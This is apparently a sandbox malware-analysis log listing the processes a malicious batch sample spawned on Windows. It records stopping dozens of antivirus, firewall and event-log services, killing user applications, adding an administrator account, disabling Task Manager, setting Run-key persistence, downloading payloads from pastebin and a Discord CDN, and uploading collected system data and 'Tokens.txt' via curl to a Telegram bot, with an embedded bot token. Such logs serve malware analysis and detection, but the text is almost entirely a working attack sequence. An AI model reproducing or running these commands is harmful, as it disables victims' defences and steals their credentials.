C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵PID:1740
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵PID:5052
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:3700
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1056
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵PID:3016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵PID:3488
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵PID:4840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵PID:4196
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵PID:4520
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵PID:936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵PID:404
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵PID:1460
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵PID:4712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵PID:1376
-
C:\Windows\system32\net.exenet stop srservice /y2⤵PID:3012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵PID:4824
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵PID:3708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵PID:4316
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵PID:4552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵PID:2028
-
C:\Windows\system32\net.exenet stop MskService /y2⤵PID:2488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵PID:3724
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵PID:3716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵PID:2140
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵PID:3444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵PID:2128
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵PID:1580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵PID:4128
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵PID:3520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵PID:2864
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵PID:3860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵PID:2336
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵PID:3252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵PID:2940
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵PID:3480
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵PID:4780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵PID:2504
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵PID:4708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵PID:2020
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:2288
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:2896
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵PID:456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵PID:208
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:4644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:4560
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:4332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:1056
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵PID:1876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵PID:3904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:3488
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵PID:1500
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵PID:3804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵PID:3960
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵PID:1336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵PID:4324
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵PID:1252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵PID:1204
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵PID:4680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵PID:1088
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵PID:1444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵PID:2064
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵PID:2924
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵PID:3216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵PID:4700
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵PID:1636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵PID:5016
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:4704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:4056
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:4248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:3000
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵PID:1856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵PID:660
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵PID:4724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵PID:1684
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵PID:3752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵PID:4760
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵PID:3372
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵PID:216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵PID:3776
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵PID:456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵PID:4516
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵PID:4564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵PID:2116
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵PID:1280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵PID:5052
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1064
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵PID:3700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵PID:4856
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵PID:4456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵PID:1500
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵PID:2356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵PID:3960
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵PID:3748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵PID:4840
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1100
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵PID:1252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵PID:1540
-
C:\Windows\system32\net.exenet stop netsvcs2⤵PID:3356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵PID:4832
-
C:\Windows\system32\net.exenet stop spoolnt2⤵PID:1844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵PID:2780
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:3056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵PID:3772
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4208
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1364
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4752
-
C:\Windows\system32\tskill.exetskill iexplore2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3180 -
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4576 -
C:\Windows\system32\tskill.exetskill excel2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4912 -
C:\Windows\system32\tskill.exetskill iTunes2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2560 -
C:\Windows\system32\tskill.exetskill calc2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1264 -
C:\Windows\system32\tskill.exetskill msaccess2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3484 -
C:\Windows\system32\tskill.exetskill safari2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4700 -
C:\Windows\system32\tskill.exetskill mspaint2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4076 -
C:\Windows\system32\tskill.exetskill outlook2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2812 -
C:\Windows\system32\tskill.exetskill WINWORD2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4056 -
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4704 -
C:\Windows\system32\tskill.exetskill firefox2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3132 -
C:\Windows\system32\tskill.exetskill LimreWire2⤵
- Suspicious behavior: EnumeratesProcesses
PID:176 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵PID:112
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵PID:4192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K ycynlog.cmd2⤵
- NTFS ADS
PID:1068 -
C:\Windows\system32\attrib.exeattrib +h +s ycynlog.cmd3⤵
- Views/modifies file attributes
PID:1624 -
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_5072_toolbar" /t "REG_SZ" /d ycynlog.cmd /f3⤵
- Adds Run key to start application
PID:4076 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f3⤵
- Modifies registry key
PID:2900 -
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f3⤵PID:2000
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"3⤵PID:2012
-
C:\Users\Admin\GetToken.exeGetToken.exe3⤵PID:2428
-
C:\Windows\system32\curl.execurl -s -o IP.txt https://ipv4.wtfismyip.com/text3⤵PID:3584
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\apps.txt"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564 -
C:\Windows\system32\curl.execurl -v -F document=@C:\Users\Admin\apps.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825383⤵PID:1404
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
PID:4692 -
C:\Windows\system32\getmac.exegetmac3⤵PID:1548
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status3⤵PID:1140
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory3⤵PID:1672
-
C:\Windows\System32\Wbem\WMIC.exewmic partition get name,size,type3⤵PID:1972
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:3136 -
C:\Windows\System32\Wbem\WMIC.exewmic path softwarelicensingservice get OA3xOriginalProductKey3⤵PID:1580
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:1672 -
C:\Windows\system32\curl.execurl -v -F document=@C:\Users\Admin\userdata.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825383⤵PID:4452
-
C:\Windows\system32\curl.execurl -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825383⤵PID:4672
-
C:\Windows\system32\curl.execurl -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825383⤵PID:4224
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:1540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵PID:2220
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:3904
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1968
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2812
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2484
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:940
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1636
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2200
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2896
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3520
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2200
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3408
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4020
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3104
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1344
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:940
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3408
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:456
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2936
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4332
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2996
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3448
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4872
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2172
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4576
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4680
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4540
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1972
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4072
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1676
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2144
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4756
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2316
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3320
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4752
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1580
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1968
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3520
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1460
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3484
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4692
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3484
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4576
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:528
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4452
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1460
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1348
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3904
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2580
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1348
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4820
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:428
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2200
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4528
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4948
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2172
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3936
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2936
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:632
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4528
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4452
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2316
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3484
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2936
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4112
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1676
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4056
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:2936
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:740
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:428
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1580
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4340
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2200
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3372
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:2020
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3416
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1104
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1868
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3492
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3484
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4860
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:1348
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4092
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4112
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:1352
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4092
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:4756
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:3408
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3936
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4528
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3752
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵PID:4060
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵PID:3820
-
